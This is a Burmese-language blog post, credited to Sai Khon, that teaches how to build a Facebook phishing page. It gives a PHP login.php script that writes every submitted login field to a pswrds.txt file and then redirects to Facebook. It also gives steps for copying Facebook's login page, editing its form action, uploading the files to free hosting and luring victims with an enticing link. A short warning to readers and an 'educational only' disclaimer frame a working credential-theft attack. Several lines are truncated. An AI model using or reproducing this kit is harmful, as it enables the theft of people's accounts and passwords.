ေဖ့ဘုတ္ဆိုတာကေတာ့ အခုေနာက္ပိုင္း ျမန္မာျပည္မွာ ေရပန္းစားလာၿပီးေတာ့ အသံုးမ်ားလာတာျဖစ္ၾကပါတယ္။တကယ္လ
သတိေပးခ်င္တာကေတာ့
ကၽြန္ေတာ္ ဒီနည္းလမ္းကို Educational only သင္ေပးတာျဖစ္ၿပီးေတာ့ အျခားမေကာင္းတဲ့ေနရာေတြမွာ အသံုးခ်တာမ်ိဳးမျပဳလုပ္ၾကပါနဲ႕။
အရင္ဆံုး Phishing နည္းနဲ႕ Facebook အေကာင့္ကို ဘယ္လိုဖမ္းတတ္ၾကသလဲ
(၁) သင့္ကို စိတ္၀င္စားေစမယ့္ ၀က္ဆိုဒ္တစ္ခုကို ဆြဲေခၚသြားမယ္
(၂) အဲဒီေရာက္ရင္ သင္ေဖ့ဘုတ္ဖြင့္ထားရင္ေတာင္ သင့္ေဖ့ဘုတ္အေကာင့္ကို Log in လုပ္ခိုင္းမယ္
(၃) သင္ log in လုပ္လိုက္တာနဲ႔ သင့္ အခ်က္အလက္ေတြအားလံုး(ပက့္၀ါ့၊ဖု
သတိေပးခ်င္တာကေတာ့ လံုး၀ မသၤကာရင္ ၀င္မၾကည့္ပါနဲ႕။အေကာင့္ ဖြင့္ထားရက္နဲ႕ ထပ္၀င္ခိုင္းရင္ မ၀င္ပါနဲ႔။Log in with Facebook ခလုတ္ေတြ႕ရင္ မႏွိပ္ပါနဲ႕။အခုေနာက္ပိုင္း ေလာ့အင္ ၀င္စရာမလိုဘဲနဲ႕ ခလုပ္နွိပ္တာနဲ႕ ရနိုင္တဲ့ နည္းေတြရွိပါတယ္။
ဒီလိုနည္းနဲ႕ ဘယ္လို Hack ၾကမလဲ
ပထမဆံုး ေဖ့ဘုတ္ရဲ႕ ေလာ့အင္ ၀င္တဲ့ေနရာကိုသြားပါ။
(ေလာ့အင္ မ၀င္ပါနဲ႕)
ၿပီးရင္ Right Click ႏွိပ္ၿပီးေတာ့ view page source ကိုႏွိပ္ပါ။စာလံုးေတြ အမ်ားႀကီးေပၚလာပါလိမ့္မယ္။Selec
(Note Pad ပါ။Word Pad မဟုတ္ပါ)
ၿပီးရင္ေတာ့ Note pad ထဲမွာ Ctrl+f ႏိွပ္ၿပီးေတာ့ ေဘာက္စ္ေပၚလာရင္ action လို႕ႏွိပ္ၿပီးရွာပါ။အဲဒီေနရာေလး
ၿပီးရင္ Note Pad ျပန္ဖြင့္ပါ။ေအာက္မွာ ေရးထားတဲ့ စာေတြကို Copy လုပ္ၿပီး Paste ျပန္ခ်ပါ။
<?php
header("Location: http://www.Facebook.com/
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
ၿပီးရင္ ခုနကအတိုင္း လုပ္ၿပီး နာမည္ကိုေတာ့ login.php လို႕ အမည္ေပးၿပီး Save လိုက္ပါ။
Note Pad ျပန္ဖြင့္ပါ။ဘာမွမေ၇းပါနဲ႕။Save
ၿပီးရင္ Free Hosting Site ေတြကို သြားပါ။Host လုပ္ၿပီးေတာ့ ဒီ ဖိုင္သံုးခုကို Upload လုပ္လိုက္ပါ။ၿပီးရင္ေတာ့ Host မွာ တစ္ခုခုေရးပါ။
လူတစ္ေယာက္ကိုဖမ္းခ်င္ရင္ေတာ့ စိတ္၀င္စားဖို႕ေကာင္းတဲ့ စာသားေတြေရး ကိုယ့္ Phishing ဆုိဒ္ရဲ႕ လင့္ကိုေပးၿပီးေတာ့ ေဖ့ဘုတ္မွာပဲျဖစ္ျဖစ္ ပို႔စ္တင္ပါ။အဲဒီလူစိတ္၀င္စားၿပ
သူ log in လုပ္လိုက္တာနဲ႕ သင့္ရဲ႕ pswrds မွာ လိႈ႕၀ွက္နံပါတ္ေတြ ေပၚလာပါလိမ့္မယ္။
မရွင္းတာရွိရင္ေမးပါ။တကယ္လို႕ မလုပ္တတ္ဘူးဆိုရင္လဲ အသင့္လုပ္ၿပီးသားေလးေတြ နမူနာျပပါမယ္။
ျပည္တြင္းက Phishing ဆိုဒ္တစ္ခုကိုလဲ နမူနာျပေပးလိုက္ပါတယ္။လံုး၀ log in မလုပ္ပါနဲ႕။
Knowledge sharing သက္သက္ပါ။သုတက အကိုေတြ၊အမေတြ ေလ့လာမွတ္သားနိုင္ေအာင္ တင္ေပးလိုက္တာပါ။မေကာင္းတဲ့ရည္ရ
ေမာင္စိုင္း
(P.S တခ်ိဳ႕သူေတြ ေမာင္စိုင္း နာမည္ကို အသံုးျပဳၿပီးေတာ့ နိုင္ငံေရးဆန္ဆန္စာေတြ ေရးေနပါသည္။ေမာင္စိုင္း နိုင္ငံေရး ဆန္ဆန္စာေတြ မေရးပါ။နာမည္ အလြဲသံုးခ်ခံရျခင္းျဖစ္ပါသည္။)
Sai Khon ၏ပိုစ့္ကိုကူးယူေဖာ္ျပပါသည္။
အကိုယ့္ ph ေလးတစ္ခ်က္ေလာက္ေျပာျပလို႔ရမလား
ReplyDelete